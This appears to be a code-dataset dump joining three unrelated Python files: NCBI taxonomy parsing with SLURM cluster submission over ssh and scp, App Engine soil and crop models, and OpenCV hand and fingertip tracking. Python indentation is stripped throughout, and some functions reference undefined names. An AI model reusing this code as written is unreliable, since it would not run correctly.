child_list_c.append(bitem)
child_list_atup = child_list_c
#print("New parent list:")
#print(child_list_atup)
child_list_a = []
for itup in child_list_atup:
child_list_a.append(itup[0])
#print(child_list_a)
#children is a list of all species-level TAXIDS that belong to the given group.
return "NA"
#WHY ARE THERE TWO OF THESE???????
def Ret_A_Valid_Species_Below(taxid, nodes_file, names_file, acc_list):
masterlist = []
#this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
complete = False
masterlist.append([(taxid, "starter")])
while complete is False:
#print(masterlist)
if masterlist == []:
return("NA")
#now lookat is the last member of the last list in masterlist.
now_list = masterlist[-1]
if now_list == []:
while [] in masterlist:
masterlist.remove([])
if masterlist == []:
return("NA")
now_list = masterlist[-1]
#lookat first member of that list.
now_tup = now_list[0]
now_taxid, now_rank = now_tup[0], now_tup[1]
#see if its a species
if now_rank == "species":
now_list.remove(now_tup)
now_name = Taxid_To_Name(now_taxid, names_file)
if now_name[0].islower() is False:
in_blast = Check_Spec_Name_Acceptable_List(now_name,acc_list)
if in_blast is True:
#now_name is a species_name
return now_name
#check if now_tup is valid. if so, return.
else:
now_list.remove(now_tup)
#generate a new list - of the descendents of this one.
newlist = Taxid_To_Children(now_taxid, nodes_file)
#print(newlist)
if newlist == "NA":
pass
else:
#add it to masterlist.
masterlist.append(newlist)
return("Uh, what?")
def Ret_All_Species_Below_Less_Efficiently(taxid, nodes_file):
children = []
list_ch_remove = []
child_list_a = []
#this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
child_list_atup = Taxid_To_Children(taxid, nodes_file)
#this is a list of children TAXIDS ONLY
for item in child_list_atup:
child_list_a.append(item[0])
#print("initial pass")
#print(child_list_atup)
#print(child_list_a)
done = False
while done is False:
for item in child_list_atup:
if item[1] == "species":
#add the taxid to the list of species_level_children
children.append(item[0])
list_ch_remove.append(item)
#remove taxids that were saved at the species level
for rem in list_ch_remove:
child_list_atup.remove(rem)
child_list_a.remove(rem[0])
#if all tips have terminated at the species level: you are done.
if child_list_a == []:
done = True
list_ch_remove = []
child_list_b = []
child_list_c = []
#for remaining non-species level taxids in lista:
# -get their children (listb)
# -add their children to a persistant list(listc)
# -then set lista(the list to check and remove species-level-entries) to be == listc.
for parent in child_list_a:
child_list_btup = Taxid_To_Children(parent, nodes_file)
for item in child_list_btup:
child_list_b.append(item[0])
if child_list_btup == []:
pass
else:
for bitem in child_list_btup:
child_list_c.append(bitem)
child_list_atup = child_list_c
#print("New parent list:")
#print(child_list_atup)
child_list_a = []
for itup in child_list_atup:
child_list_a.append(itup[0])
#print(child_list_a)
#children is a list of all species-level TAXIDS that belong to the given group.
return children
def Ret_All_Groups_One_Rank_Below(taxid, nodes_file):
taxid = taxid.strip()
print("looking for taxid:"+str(taxid))
rank = Get_Taxid_Rank(taxid, nodes_file)
print(rank)
#raise SystemExit
target_rank = One_Rank_Lower(rank)
if target_rank == "NA":
return("NA")
removal_ranks = "superkingdom kingdom phylum class order family genus species"
garbage, remove_string = removal_ranks.split(target_rank)
remove_rank_list = remove_string.split()
children = []
list_ch_remove = []
#print(remove_rank_list)
#this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
child_list_a = Taxid_To_Children(taxid, nodes_file)
done = False
while done is False:
for item in child_list_a:
if item[1] == target_rank:
#add the taxid to the list of species_level_children
children.append(item[0])
list_ch_remove.append(item)
if item[1] in remove_rank_list:
list_ch_remove.append(item)
#remove taxids that were saved at the species level
for rem in list_ch_remove:
child_list_a.remove(rem)
#if all tips have terminated at the target species level: you are done.
if child_list_a == []:
done = True
list_ch_remove = []
child_list_b = []
child_list_c = []
#for remaining non-species level taxids in lista:
# -get their children (listb)
# -add their children to a persistant list(listc)
# -then set lista(the list to check and remove species-level-entries) to be == listc.
for parent in child_list_a:
child_list_b = Taxid_To_Children(parent[0], nodes_file)
if child_list_b == []:
pass
else:
for bitem in child_list_b:
child_list_c.append(bitem)
child_list_a = child_list_c
#print(child_list_a)
#children is a list of all ONE-RANK-BELOW level TAXIDS that belong to the given group.
return children
#runs until all children are found of one rank below. eg (CLASS -> [order1, order 2, order3, order 4)
#for checking loss candidates, i will want to 1) run this 2) run a species_level_children generation for each member of the output list. 3) chose one member of each of those output lists to go in the species tree. hopefully checking that we have data for the chosen species.
def Ret_Sister_Same_Rank(string, nodes_file, names_file):
#from str rank - get current taxid, go up one level, then get all descendents in a list, remove the current taxid, and return the resulting sister list
print(string)
interest_taxid = Str_To_Taxid(string, names_file)
print(interest_taxid)
up_taxid = Return_Parent(interest_taxid, nodes_file)
up_taxid = up_taxid.strip()
interest_taxid = interest_taxid.strip()
sis_self_tuples = Taxid_To_Children(up_taxid, nodes_file)
sister_and_self = []
for tup in sis_self_tuples:
sister_and_self.append(tup[0])
#sis_and_self is a list of TAXIDS ONLY
print(sister_and_self)
print(interest_taxid)
sister_and_self.remove(interest_taxid)
sisterlist = sister_and_self
print(sisterlist)
return sisterlist
#sisterlist will be a list of taxids for the sister clades to the current thing. by level, not by rank.
#todo = implement something to redo if sisterlist is empty.
def Taxid_To_Name(taxid, names_file):
#this needs to be the backwards version of Str to Taxid.
found = False
taxid = taxid.strip()
len_tax = len(taxid)
len_tax_t = len_tax+1
with open (names_file) as names:
for line in names:
if line[:len_tax_t] == taxid+"\t":
# print("got here")
name_wanted = re.sub ("(\d*)(\t\|\t)([^\t]*)(\t\|\t)(.*)(\t\|\t)(scientific name)(.*)", "\\3", line)
if "\t" in name_wanted:
pass
else:
found = True
break
if found is False:
print("Error finding name for: "+taxid+" in file: "+names_file)
name_wanted = "NA"
if found is True:
#print(name_wanted)
name_wanted = name_wanted.strip()
return name_wanted
def Choose_One_OG_Seq(string, species_list, names_file, acc_list, nodes_file):
print("one og sequence choser initiating")
if "_" in string:
string = string.replace("_", " ")
sislist = Ret_Sister_Same_Rank(string, nodes_file, names_file)
print("Sisterlist")
print(sislist)
if sislist == []:
go = True
else:
go = False
my_taxid = Str_To_Taxid(string, names_file)
while go is True:
parent_of_me_taxid = Return_Parent(my_taxid, nodes_file)
parent_of_me = Taxid_To_Name(parent_of_me_taxid, names_file)
sislist = Ret_Sister_Same_Rank(parent_of_me, nodes_file, names_file)
my_taxid = parent_of_me_taxid
if sislist == []:
pass
else:
go = False
for item in sislist:
#spec_sis_list = Ret_All_Species_Below(item, nodes_file)
test = Ret_A_Valid_Species_Below(item, nodes_file, names_file, acc_list)
if test == "NA":
pass
else:
print(test)
return test
#if test == "None":
# return "None"
#if nothing in the first level sister list is a valid hit, keep moving up the tree until you get one.
while test == "NA":
sislist = []
go = True
if my_taxid == 1:
break
while go is True:
parent_of_me_taxid = Return_Parent(my_taxid, nodes_file)
parent_of_me = Taxid_To_Name(parent_of_me_taxid, names_file)
sislist = Ret_Sister_Same_Rank(parent_of_me, nodes_file, names_file)
my_taxid = parent_of_me_taxid
if sislist == []:
pass
else:
go = False
for item in sislist:
test = Ret_A_Valid_Species_Below(item, nodes_file, names_file, acc_list)
if test != "NA":
pass
else:
return test
return test
#print (spec_sis_list)
#for sis_spec_taxid in spec_sis_list:
# sis_spec_name = Taxid_To_Name(sis_spec_taxid, names_file)
# in_blast = Check_Spec_Name_Blast_File(sis_spec_name, blast_file)
# if in_blast is True:
# print("Outgroup sequence chosen:"+sis_spec_name)
# return sis_spec_name
#double break so we only keep ONE sequence.
#go all the way down the first one until you get a species-level entry.
#check if the species-level entry is found in your .blast file (if that is where we are implementing this??? )
#if not, continue... check each species-level thing you find.
#this would then need to be included in make_species_trees... and only called if the request is sent directly from Parser_blah_master.
def Check_If_We_Have_A_Rep_Already(species_list, tid_list, rank):
print("Checking for reps... target rank is: "+rank)
list_of_correct_rank = []
found = []
removal_ranks = "superkingdom kingdom phylum class order family genus species"
remove_string, garbage = removal_ranks.split(rank)
remove_rank_list = remove_string.split()
for species in species_list:
nid = Str_To_Taxid(species, names_file)
#go up the ladder
go = True
while go is True:
#get parent taxid
rp = Return_Parent(nid, nodes_file)
#if its 1, we're done.
if rp == "NA":
list_of_correct_rank.append(rp)
go = False
if rp.strip() == 1:
rp = "NA"
list_of_correct_rank.append(rp)
go = False
#get rank for that new taxid
par_rank = Get_Taxid_Rank(rp, nodes_file)
#if it's what we want it to be, add to list.
if par_rank == rank:
rp = rp.strip()
list_of_correct_rank.append(rp)
go = False
#if its a step too high, terminate - we went too far somehow
elif par_rank in remove_rank_list:
rp = "NA"
list_of_correct_rank.append(rp)
go = False
#else, go up another level and test that one!
else:
nid = rp
print(tid_list)
print(list_of_correct_rank)
for item in tid_list:
if item in list_of_correct_rank:
a = tid_list.index(item)
found.append(tid_list[a])
return found
#@blast_file should actually be a list of raw_blast_FASTA objects
def Choose_Loss_Candidates(string, species_list, names_file, acc_list, nodes_file):
print("loss search initiating")
if "_" in string:
print(string)
string = string.replace("_", " ")
print(string)
taxid = Str_To_Taxid(string, names_file)
#for checking loss candidates, i will want to 1) run this 2) run a species_level_children generation for each member of the output list. 3) chose one member of each of those output lists to go in the species tree. hopefully checking that we have data for the chosen species.
sub_taxids = Ret_All_Groups_One_Rank_Below(taxid, nodes_file)
if sub_taxids == "NA":
print("Error getting loss candidates for string:"+string)
return([])
subgroup_names = []
for item in sub_taxids:
subgroup_names.append(Taxid_To_Name(item, names_file))
b = Get_Taxid_Rank(taxid, nodes_file)
a = One_Rank_Lower(b)
found = Check_If_We_Have_A_Rep_Already(species_list, sub_taxids, a)
print("Representatives already exist for:")
found_names = []
for foundtid in found:
foundtid = foundtid.strip()
index1 = sub_taxids.index(foundtid)
found_names.append(subgroup_names.pop(index1))
del sub_taxids[index1]
print(found_names)
print("Looking for one representative from each of the following:")
print(subgroup_names)
loss_list = []
ite = 0
# #first check if it is in the output loss list.
# for item in sub_taxids:
# with open(saved_loss_candidates) as saved:
# for line in saved:
# if item in line:
# #newthing will be a species name.
# newthing = re.sub("("item")(\t)(.*)", "\\3", line))
# loss_list.append(newthing)
# found2.append(item)
# break
#remove those found from file from the search list.
# for item in found2:
# sub_taxids.pop(item)
for item in sub_taxids:
test = Ret_A_Valid_Species_Below(item, nodes_file, names_file, acc_list)
#print(test)
print(subgroup_names[ite]+" : "+test)
ite+=1
loss_list.append(test)
continue
print("Loss candidates will be added:")
na = 0
for item in loss_list:
if item == "NA":
na +=1
while "NA" in loss_list: loss_list.remove("NA")
print(loss_list)
print("there were "+str(na)+" "+a+"s that no suitable loss candidate was found for.")
return loss_list
#either one per next-level-down
#or one per next-rank-down
def Check_Spec_Name_Acceptable_List(ssp_name, acc_list):
if ssp_name in acc_list:
return True
else:
result = next((True for item in acc_list if ssp_name in item), False)
if result is True:
print("Err in match spec name - gen list: "+ ssp_name +" "+ item)
return result
def Check_Spec_Name_Blast_File(ssp_name, blast_fasta_list):
lf = (len(blast_fasta_list))
half = lf/2
yes = 0
att = 0
#print("Checking :"+ssp_name)
ssp_name = ssp_name.replace(" ", "_")
ssp_name = ssp_name.strip()
for current_blast in blast_fasta_list:
att += 1
if att > 6:
if yes < att/3:
return False
if ssp_name in current_blast.species_names:
yes += 1
continue
else:
#print(ssp_name)
#print(current_blast.species_names[0])
for spec in current_blast.species_names:
if ssp_name in spec:
yes +=1
break
continue
#print(yes)
#print(half)
if yes > half:
#print("validated: "+ssp_name)
return True
else:
return False
def gen_acceptable_species_list(list_raw_gene_fastas, acc_name):
#this is printing an empty file. why?
names_list_acc = []
numbers_list_acc = []
for raw in list_raw_gene_fastas:
#do they have species lists?
raw.gen_species_lists()
raw_sl = raw.species_names
print(raw_sl[0])
for rawsp in raw_sl:
if rawsp in names_list_acc:
ind = names_list_acc.index(rawsp)
numbers_list_acc[ind] = numbers_list_acc[ind]+1
else:
names_list_acc.append(rawsp)
numbers_list_acc.append(1)
#the numbers list can specify a cut off that is necesary for the thing being acceptable
#for now let's be consistant and use 1/2 of lsit of raw fastas?
cutoff_num = (len(list_raw_gene_fastas)/2)
print(cutoff_num)
#this will be 15 currently. might be .5 sometimes.
list_of_rem = []
index = 0
for n in numbers_list_acc:
if n > cutoff_num:
#means that we dont care if its a decimal or not. 1 will pass .5
pass
else:
list_of_rem.append(names_list_acc[index])
#add the index to be removed to a list. index into names and numbers should be identicle
index +=1
print(len(list_of_rem))
list_of_rem.sort(reverse=True)
for remove_me in list_of_rem:
#uhhhhh i think we need to sort the numbers so removal of the largest number happens first so as to not fuck up list order.
#sorting now. should be good.
names_list_acc.remove(remove_me)
a = write_acc_list(names_list_acc, acc_name)
return a
def write_acc_list(acc_list, acc_name):
with open(acc_name, "w") as acc_list_file:
for item in acc_list:
acc_list_file.write(item+"\n")
return acc_name
def write_spc_list(spc_list, spcname):
with open(spcname, "w") as spc_list_file:
for item in spc_list:
#stripiing strain data from this version of the species_list such that it will
if "_" in item:
dash_sep = item.split("_")
item = dash_sep[0]+"_"+dash_sep[1]
spc_list_file.write(item+"\n")
return spcname
#parser stuff
def Run_OG_LOSS_ON_CLUSTER(script_name,all_files, all_result_files):
#here acc list is the name of the acc_list_current_file
#auto gen an sbatch script
os.system(ssh_inst+" \'mkdir Taxonomy\'")
sb_script = script_name
#scp it over
print(all_files)
for item in all_files:
os.system("scp "+item+" "+clus_head+"Taxonomy")
#run it
#edit the script on the cluster to deal with my mistakes
os.system(ssh_inst+" 'cd ~/Taxonomy; sbatch "+sb_script+"'")
#scp it back and verify
direct = os.getcwd()
exists = False
#now it should exist locally
movehome = []
finished = "start"
#bring home the d
for i in all_result_files:
movehome.append(i)
while finished is not True:
for filename in movehome:
os.system("scp "+clus_head+"Taxonomy/"+filename+" "+direct)
for item in all_result_files:
#see if it got moved home.
exists = os.path.isfile(item)
if exists is True:
if item in movehome:
movehome.remove(item)
finished = "yes"
else:
finished = False
print("Tax not done yet. could not locate : "+item+"checking again in 5 minutes")
break
if finished == "yes":
print("Should be done!")
finished = True
else:
#wait ten minutes and then try again.
time.sleep(600)
finished = "yes"
#TEMPORARILY REMOVED result file deletion from the cluster to make testing progress faster.
#for item in all_result_files:
# os.system(ssh_inst+" 'cd ~/Taxonomy; rm "+item+"'")
#for item in all_files:
# os.system(ssh_inst+" 'cd ~/Taxonomy; rm "+item+"'")
print("Taxonomy parsing complete")
#remove the script and the og loss file from cluster
def Get_OG_LOSS_DATA(list_of_clades, projectname):
#the acceptable list should be a list of taxa that are present in at least 50% (?) of the blast hit files for the genes given.
#get all gene-query-files to look at
list_catfiles = []
list_of_lists_of_raw_blast_files = []
for item in list_of_clades:
catfile = item.cat_file
list_of_raw_blast_files = item.blast_raw
if catfile in list_catfiles:
pass
else:
list_catfiles.append(catfile)
list_of_lists_of_raw_blast_files.append(list_of_raw_blast_files)
cat_acc_dict = {}
#for each, create an acceptable list output name
for i in range(len(list_catfiles)):
item = list_catfiles[i]
list_raws = list_of_lists_of_raw_blast_files[i]
gsflist = item.split(".")
gsf_a = gsflist[0]
gsf_b = gsf_a.split("/")[-1]
acc_file = gsf_b+"_Acc_List.txt"
#print("Looking for loss-candidates and a rooting sequence to add....")
acc_exists = os.path.isfile(acc_file)
if acc_exists is True:
pass
#if not already done, actually make the output acceptable list.
else:
print("....initializing all_acceptables from gene_seq_query file: "+gsf_b+". this should only happen once...")
#generate it
#should be passing in A LIST OF ALL THE BLAST_FILES ASSOCIATED WITH THE GENE. eg the things in Raw_Blasts that were consulted.
#are these stored in each subtree? should pass a list of fasta objects.
#ist_raw_objects = []
#rint(list_raws)
#or raw in list_raws:
# print(raw.name)
acc_file = gen_acceptable_species_list(list_raws, acc_file)
#this is returning "NONE" which is super not okay.
cat_acc_dict[item] = acc_file
list_of_species_files = Gen_Species_File(list_of_clades, projectname)
#check if we already ran the taxonomy and have data downloaded. (this is mostly for while fixing errors; i keep getting stuck at this point & ity is a waste of time to re-run the taxonomy parser.
list_to_tax_clades = []
for item in list_of_clades:
exists_result = os.path.isfile(item.result)
if exists_result is False:
list_to_tax_clades.append(item)
#sets species_file and result to each subtree.
corr_file_name, results_list = Generate_Cat_File_OGLOSS(list_to_tax_clades, cat_acc_dict, projectname)
#makes the correlation file.
#for each clade, generate a species_list, result name, acc_file_name, string_name and print them all to a corr.file
n = len(list_to_tax_clades)
#gen the script
script_name = projectname+"_OGLScript.sh"
scriptfile = Generate_Script_File_OGLOSS(n, corr_file_name, script_name)
all_files = []
for item in cat_acc_dict.values():
all_files.append(item)
for item in list_of_species_files:
all_files.append(item)
all_files.append(scriptfile)
all_files.append(corr_file_name)
if len(results_list) is 0:
pass
else:
Run_OG_LOSS_ON_CLUSTER(scriptfile,all_files, results_list)
#run the script
#add loss_species, root_species to each subtree as a value and also add them to the species_list going forward.
for item in list_of_clades:
results_file = item.result
loss_species = []
print(item.string_name)
#open the file and get loss and species results.
with open(results_file) as res:
# print("opened")
a=0
for line in res:
#get loss results
if a == 0:
loss_species = line.strip()
loss_species = loss_species.split("~")
print("loss candidates")
if "" in loss_species:
loss_species.remove ("")
if "\n" in loss_species:
loss_species.remove("\n")
item.loss_species_list = loss_species
print(loss_species)
#get root results
if a == 1:
root_species = line.strip()
item.root_species = root_species
print("root: "+root_species)
#get how long it took
if a == 2:
print("time:")
print(line)
a += 1
#if no loss, do nothing
item.species_list_plus_og_loss = []
for thing in item.species_list_original:
item.species_list_plus_og_loss.append(thing)
if loss_species == []:
pass
#else, add them to the species list, and also track them(?)
else:
for ls in loss_species:
item.species_list_plus_og_loss.append(ls)
if root_species == "":
pass
else:
item.species_list_plus_og_loss.append(root_species)
return results_list
# os.system("rm "+results_file)
#done
def Generate_Cat_File_OGLOSS(list_of_clades, cat_acc_dict, projectname):
corr_file_name = "Corr_"+projectname+".txt"
results_list = []
with open(corr_file_name, "w") as corr:
for n in range(len(list_of_clades)):
corr.write(str(n+1)+" "+list_of_clades[n].species_file+" "+list_of_clades[n].string_name+" "+cat_acc_dict[list_of_clades[n].cat_file]+" "+list_of_clades[n].result+"\n")
results_list.append(list_of_clades[n].result)
return corr_file_name, results_list
def Generate_Script_File_OGLOSS(n, indexname, scriptname):
n = str(n)
a = """#!/bin/bash
#SBATCH -p sched_mit_g4nier
#SBATCH -t 2-00:00:00
#SBATCH -J Tax
#SBATCH --array=1-"""+n+"""
. /etc/profile.d/modules.sh
module add engaging/openmpi/1.8.8
MY_ARRAY_ID=$SLURM_ARRAY_TASK_ID
THE_INDEX="""+indexname+"""
SPECIES_FILE=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $2}' )
STRING_NAME=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $3}' )
ACC_FILE=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $4}' )
RESULT=$( cat $THE_INDEX | grep "^$MY_ARRAY_ID " | awk '{print $5}' )
echo $SPECIES_FILE
echo $STRING_NAME
echo $ACC_FILE
mpirun python Online_Taxon_Parse.py -s $SPECIES_FILE -g $STRING_NAME -b $ACC_FILE -n $RESULT
exit"""
with open(scriptname, "w") as script:
script.write(a)
return scriptname
def Gen_Species_File(list_of_clades, projectname):
list_sp_files = []
for item in list_of_clades:
species_list = item.species_list_original
species_file_name = item.prefix+"_Species_List.txt"
species_list2 = []
for sl2 in species_list:
sl2 = sl2.strip("\"")
species_list2.append(sl2)
spc_file = write_spc_list(species_list2, species_file_name)
item.species_file = species_file_name
list_sp_files.append(species_file_name)
item.result = item.prefix+"_OGL_Result.txt"
return list_sp_files
|
4,861 | 01a6283d2331590082cdf1d409ecdb6f93459882 | import cgi
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext import db
from models.nutrient import *
class SoilRecord(db.Model):
year=db.DateProperty(auto_now_add=True)
stats=NutrientProfile()
amendments=db.StringProperty()
notes=db.StringProperty()
@property
def plot(self):
Plot.gql("Where soilrecord=:1",self.key())
def create(self, year):
self.year=year
class CropRecord(db.Model):
year=db.DateProperty(auto_now_add=True)
crops=db.ListProperty(db.Key)
notes=db.StringProperty()
@property
def plot(self):
Plot.gql("Where croprecord=:1",self.key())
def create(self, year):
self.year=year
def addCrop(self, crop):
if addByKey(crop, self.crops):
self.put()
|
4,862 | c3e313805c6f91f9aac77922edfd09650143f905 | import cv2
import numpy as np
from math import *
def appendimages(im1,im2):
""" Return a new image that appends the two images side-by-side. """
# select the image with the fewest rows and fill in enough empty rows
rows1 = im1.shape[0]
rows2 = im2.shape[0]
if rows1 < rows2:
im1 = np.concatenate((im1,zeros((rows2-rows1,im1.shape[1]))),axis=0)
elif rows1 > rows2:
im2 = np.concatenate((im2,zeros((rows1-rows2,im2.shape[1]))),axis=0)
# if none of these cases they are equal, no filling needed.
return np.concatenate((im1,im2), axis=1)
def append_imgs(im1, im2, im3):
#buff = appendimages(im1,im2)
#return appendimages(buff,im3)
buff = np.concatenate((im1,im2), axis=1)
return np.concatenate((buff,im3), axis=1)
#check whether the point is near edge or not
def point_not_at_edge( x, y, img_height, img_width, threshold):
no_at_edge = ( (x > threshold) and (y > threshold) and ( fabs(x - img_width) > threshold ) and ( fabs(y - img_height) > threshold ) )
return no_at_edge
#check whether two points are too near from each other
def points_not_similar(x, y, x_neighb, y_neighb, threshold):
no_same_point = (fabs(x - x_neighb) + fabs(y - y_neighb) > 2*threshold)
return no_same_point
def good_points(x, y, x_next, y_next, img_height, img_width, threshold):
no_same_point = (fabs(x - x_next) + fabs(y - y_next) > 2*threshold)
no_at_edge = (x > threshold) and (y > threshold) and ( fabs(x - img_width) > threshold ) and ( fabs(y - img_height) > threshold )
return (no_same_point and no_at_edge)
'''
calculate the point on wrist of the hand
by taking the average of opposites of convexity defects to the center
'''
def find_wrist(center, contour, set_idx_convDefs):
n = len(set_idx_convDefs)
opposites = np.zeros((2,n))
for i in range(n):
opposites[0,i] = 2*center[0] - contour[set_idx_convDefs[i], 0, 0] #calcul x
opposites[1,i] = 2*center[1] - contour[set_idx_convDefs[i], 0, 1] #calcul y
total = np.sum(opposites, axis = 1)
#print total
x = int(total[0]/n)
y = int(total[1]/n)
wrist = (x, y)
#print 'wrist = ', wrist
return wrist
'''
simple methods to detect finger tips
by calculating the farthest points on convex hull
compared to a fixed point. This fixed point can be center or wrist
'''
def simple_detect_fingerTips(hull, img, fixedPoint, edge_thresh, neighbor_thresh):
dist_from_fixedPoint = []
img_height, img_width = img.shape[0:2]
hull_nbPts = hull.shape[0]
#calculate distance to fixed Point
for i in range(hull_nbPts):
dist_from_fixedPoint.append(cv2.norm(fixedPoint - hull[i], cv2.NORM_L2))
#sort index from farthest to nearest
max_indx = np.argsort(-1*np.array(dist_from_fixedPoint))
#need to eliminate same points and points at edge
#results stored in idx_ok, the list of candidate indices of hulls
idx_ok = []
for i in range(hull_nbPts):
idx = max_indx[i]
if point_not_at_edge(hull[idx,0,0], hull[idx,0,1], img_height, img_width, edge_thresh):
if(len(idx_ok) == 0):
idx_ok.append(idx)
else:
not_similar = True
for idx_neighbor in idx_ok:
not_similar = (points_not_similar(hull[idx,0,0], hull[idx,0,1], hull[idx_neighbor,0,0], hull[idx_neighbor,0,1],neighbor_thresh))
if not not_similar: #if similar break the loop
break
if(not_similar):
idx_ok.append(idx)
return idx_ok
def simple_preprocessing(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5,5), 0)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10,10))
blur = cv2.erode(blur, kernel, iterations = 2)
blur = cv2.dilate(blur, kernel, iterations = 2)
ret, bin_image = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return bin_image
def simple_preprocessing2(img, backGround):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray2 = cv2.cvtColor(backGround, cv2.COLOR_BGR2GRAY)
gray = gray-gray2
blur = cv2.GaussianBlur(gray, (5,5), 0)
#kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10,10))
#blur = cv2.erode(blur, kernel, iterations = 2)
#blur = cv2.dilate(blur, kernel, iterations = 2)
ret, bin_image = cv2.threshold(blur, 70, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return bin_image
def hsv_preprocessing(img):
#define boundaries of HSV pixel intensities to be considered as 'skin'
#H: 2-39 / 360 * 255 = 1-28
#S: 0.15 - 0.9 / 1 * 255 = 38- 250
#V: 0.2 - 0.95 / 1 * 255 =
lower = np.array([1, 38, 51])
upper = np.array([28, 250, 242])
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
#hsv = cv2.GaussianBlur(hsv, (5,5), 0)
skinMask = cv2.inRange(hsv, lower, upper)
#choosing a structure elements to apply noise-remove process
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10,10))
skinMask = cv2.erode(skinMask, kernel, iterations = 2)
skinMask = cv2.dilate(skinMask, kernel, iterations = 2)
blur = cv2.GaussianBlur(skinMask, (5,5), 0)
ret, bin_image = cv2.threshold(blur, 70, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return bin_image
def find_contour_hull(binary_image):
#find the contour
contours, hierarchy = cv2.findContours(binary_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#search the maximum contour in the hierachy tree of contours
max_area = 0
ci = 0
for i in range(len(contours)):
cnt = contours[i]
area = cv2.contourArea(cnt)
if(area > max_area):
max_area = area
ci = i
cnt = contours[ci]
hull = cv2.convexHull(cnt)
hull_idx = cv2.convexHull(cnt, returnPoints = False)
return cnt, hull, hull_idx
def draws_contour_hull(img, cnt, hull):
#draws the image with only the contour and its convex hull
drawing = np.zeros(img.shape, np.uint8)
cv2.drawContours(drawing, [cnt], 0, (0, 255, 0), 3)
cv2.drawContours(drawing, [hull], 0, (0, 0, 255), 3)
return drawing
def eliminate_background(img, backGround, thres_diff):
height, width, depth = img.shape
for i in range(height):
for j in range(width):
erase = True
for k in range(depth):
if(fabs(img[i,j,k] - backGround[i,j,k]) > thres_diff):
erase = False
if erase:
img[i,j,:] = 0
return img
'''
Tracking by camera
NOTE: hsv is very color and light sensitive and simple_preprocessing seems stabler
'''
'''
firstSec = 0
camera = cv2.VideoCapture(0)
for i in range(12):
camera.read()
grabbed, backGround = camera.read()
for i in range(12):
grabbed, img = camera.read()
backGround = backGround/2 + img/2
'''
def tracking():
camera = cv2.VideoCapture(0)
_,img = camera.read()
h,w,d = img.shape
#out = cv2.VideoWriter('video.avi',-1,1,(3*w,h))
fourcc = cv2.cv.CV_FOURCC('F', 'M', 'P', '4')
out = cv2.VideoWriter()
success = out.open('output.avi',fourcc, 15, (3*w,h), True)
waitTime = 100
for i in range(waitTime):
_, average = camera.read()
#average = np.float32(average)
index_im = 0
while True:
grabbed, img = camera.read()
#alpha = 0.01 #factor of forgetting
#cv2.accumulateWeighted(img, average, alpha)#img is src, average is dst
img_diff = cv2.absdiff(img, average)#convert scale and do subtract these 2 images
#cv2.imshow('img_diff', img_diff)
#substract background
#img = eliminate_background(img, backGround, 20)
#bin_image = simple_preprocessing(img, backGround)
bin_image = simple_preprocessing(img_diff)
bin_image2 = bin_image.copy()
cv2.imshow('binaire', bin_image2)
# bin_image = hsv_preprocessing(img)
# cv2.imshow('orig', img)
# cv2.imshow('bin', bin_image)
# cv2.waitKey(0)
cnt, hull, hull_idx = find_contour_hull(bin_image)
drawing = draws_contour_hull(img, cnt, hull)
#search the points between each finger by using convexity defects
#see the doc of opencv to understand implementation details
convDefs = cv2.convexityDefects(cnt, hull_idx)
dist_order = np.argsort((-1)*convDefs[:,0,3])
max4dist = dist_order[0:4]
max4points = convDefs[max4dist,0,2]
for i in max4points:
cv2.circle(drawing, tuple(cnt[i,0]), 5, [255,255,0], 2)
hull_nbPts = hull.shape[0]
'''
#draws all the points constitue the convex hull (for debugging)
for i in range(hull_nbPts):
cv2.circle(drawing, tuple(hull[i,0]), 4, [255,0,0], 2)
cv2.putText(drawing, str(i), tuple(hull[i,0]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, [255,0,0], 1, cv2.CV_AA)
'''
#find and draw center of contour
moments = cv2.moments(cnt)
if moments['m00']!=0:
cx = int(moments['m10']/moments['m00']) # cx = M10/M00
cy = int(moments['m01']/moments['m00']) # cy = M01/M00
centr=(cx,cy)
cv2.circle(drawing, centr, 5, [0, 255, 255], 2)
#find and draw point represents the wrist of the hand
wrist = find_wrist(centr, cnt, max4points)
cv2.circle(drawing, wrist, 5, [0, 255, 255], 2)
edge_thresh = 20
neighbor_thresh = 20
fixedPoint = wrist
idx_ok = simple_detect_fingerTips(hull, img, fixedPoint, edge_thresh, neighbor_thresh)
#print 'list of idx_ok = ', idx_ok
max_5hull_idx = idx_ok[0:5]
#print 'first five of idx_ok = ', max_5hull_idx
for i in max_5hull_idx:
cv2.circle(drawing, tuple(hull[i,0]), 6, [0,255,0], 2)
#print hull[i]
#print dist_from_center
#cv2.imshow('contour and convex hull', drawing)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
drawing = cv2.cvtColor(drawing, cv2.COLOR_BGR2GRAY)
'''
print img.shape
print bin_image2.shape
print drawing.shape
'''
frame = append_imgs(img, bin_image2, drawing)
#cv2.imshow('frame', frame)
#out.write(frame)
cv2.imwrite("store2/" + "img"+str(index_im) + ".jpg", frame)
index_im += 1
if cv2.waitKey(1) & 0xFF == ord("q"):
break
camera.release()
out.release()
#self.out = None
cv2.destroyAllWindows()
def main():
image_name = "hand_in_BG5.png"
img = cv2.imread(image_name)
bin_image = simple_preprocessing(img)
#bin_image = hsv_preprocessing(img)
cv2.imshow('orig', img)
cv2.imshow('bin', bin_image)
cv2.waitKey(0)
cnt, hull, hull_idx = find_contour_hull(bin_image)
drawing = draws_contour_hull(img, cnt, hull)
#search the points between each finger by using convexity defects
